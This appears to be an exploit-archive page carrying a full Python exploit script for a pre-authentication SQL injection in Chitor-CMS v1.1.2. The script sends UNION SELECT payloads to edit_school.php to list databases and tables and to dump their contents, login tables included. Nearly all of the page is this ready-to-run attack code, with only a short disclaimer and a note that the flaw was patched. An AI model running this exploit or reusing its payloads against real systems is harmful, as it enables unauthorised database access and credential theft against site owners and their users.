Chitorcms v1.1.2 preauth sql injection Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2023-04-20 | Type : webapps | Platform : php
This exploit / vulnerability Chitorcms v1.1.2 preauth sql injection is for educational purposes only and if it is used you will do on your own risk!

---

[+] Code ...

#!/usr/bin/python3

#######################################################
# #
# Exploit Title: Chitor-CMS v1.1.2 - Pre-Auth SQL Injection #
# Date: 2023/04/13 #
# ExploitAuthor: msd0pe #
# Project: https://github.com/waqaskanju/Chitor-CMS #
# My Github: https://github.com/msd0pe-1 #
# Patched the 2023/04/16: 69d3442 commit #
# #
#######################################################

__description__ = 'Chitor-CMS < 1.1.2 Pre-Auth SQL Injection.'
__author__ = 'msd0pe'
__version__ = '1.1'
__date__ = '2023/04/13'

class bcolors:
PURPLE = '\033[95m'
BLUE = '\033[94m'
GREEN = '\033[92m'
OCRA = '\033[93m'
RED = '\033[91m'
CYAN = '\033[96m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'

class infos:
INFO = "[" + bcolors.OCRA + bcolors.BOLD + "?" + bcolors.ENDC + bcolors.ENDC + "] "
ERROR = "[" + bcolors.RED + bcolors.BOLD + "X" + bcolors.ENDC + bcolors.ENDC + "] "
GOOD = "[" + bcolors.GREEN + bcolors.BOLD + "+" + bcolors.ENDC + bcolors.ENDC + "] "
PROCESS = "[" + bcolors.BLUE + bcolors.BOLD + "*" + bcolors.ENDC + bcolors.ENDC + "] "

import re
import requests
import optparse
from prettytable import PrettyTable

def DumpTable(url, database, table):
header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
x = PrettyTable()
columns = []
payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ccolumn_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=\"" + table + "\" AND table_schema=\"" + database + "\"-- -"
u = requests.get(url + payload, headers=header)
try:
r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
r = r[0].replace('\"',"").split(',')
if r == []:
pass
else:
for i in r:
columns.append(i)
pass
except:
pass
x.field_names = columns
payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2C " + str(columns).replace("[","").replace("]","").replace("\'","").replace(" ","") + "))%2C0x716a6b6271) FROM " + database + "." + table + "-- -"
u = requests.get(url + payload, headers=header)
try:
r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
r = r[0].replace('\"',"").split(',')
if r == []:
pass
else:
for i in r:
i = i.split("xzmdpl")
x.add_rows([i])
except ValueError:
r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
r = r[0].replace('\"',"").split(',')
if r == []:
pass
else:
for i in r:
i = i.split("xzmdpl")
i.append("")
x.add_rows([i])
print(x)

def ListTables(url, database):
header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
x = PrettyTable()
x.field_names = ["TABLES"]
payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ctable_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x" + str(database).encode('utf-8').hex() + ")-- -"
u = requests.get(url + payload, headers=header)
try:
r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
r = r[0].replace('\"',"").split(',')
if r == []:
pass
else:
for i in r:
x.add_row([i])
except:
pass
print(x)

def ListDatabases(url):
header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
x = PrettyTable()
x.field_names = ["DATABASES"]
payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Cschema_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.SCHEMATA-- -"
u = requests.get(url + payload, headers=header)
try:
r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
r = r[0].replace('\"',"").split(',')
if r == []:
pass
else:
for i in r:
x.add_row([i])
except:
pass
print(x)

def Main():
Menu = optparse.OptionParser(usage='python %prog [options]', version='%prog ' + __version__)
Menu.add_option('-u', '--url', type="str", dest="url", help='target url')
Menu.add_option('--dbs', action="store_true", dest="l_databases", help='list databases')
Menu.add_option('-D', '--db', type="str", dest="database", help='select a database')
Menu.add_option('--tables', action="store_true", dest="l_tables", help='list tables')
Menu.add_option('-T', '--table', type="str", dest="table", help='select a table')
Menu.add_option('--dump', action="store_true", dest="dump", help='dump the content')
(options, args) = Menu.parse_args()

Examples = optparse.OptionGroup(Menu, "Examples", """python3 chitor1.1.py -u http://127.0.0.1 --dbs
python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db --tables
python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump
""")
Menu.add_option_group(Examples)

if len(args) != 0 or options == {'url': None, 'l_databases': None, 'database': None, 'l_tables': None, 'table': None, 'dump': None}:
Menu.print_help()
print('')
print(' %s' % __description__)
print(' Source code put in public domain by ' + bcolors.PURPLE + bcolors.BOLD + 'msd0pe' + bcolors.ENDC + bcolors.ENDC + ',' + bcolors.RED + bcolors.BOLD + 'no Copyright' + bcolors.ENDC + bcolors.ENDC)
print(' Any malicious or illegal activity may be punishable by law')
print(' Use at your own risk')

elif len(args) == 0:
try:
if options.url != None:
if options.l_databases != None:
ListDatabases(options.url)
if options.database != None:
if options.l_tables != None:
ListTables(options.url, options.database)
if options.table != None:
if options.dump != None:
DumpTable(options.url, options.database, options.table)
except:
print("Unexpected error")

if __name__ == '__main__':
try:
Main()

except KeyboardInterrupt:
print()
print(infos.PROCESS + "Exiting...")
print()
exit(1)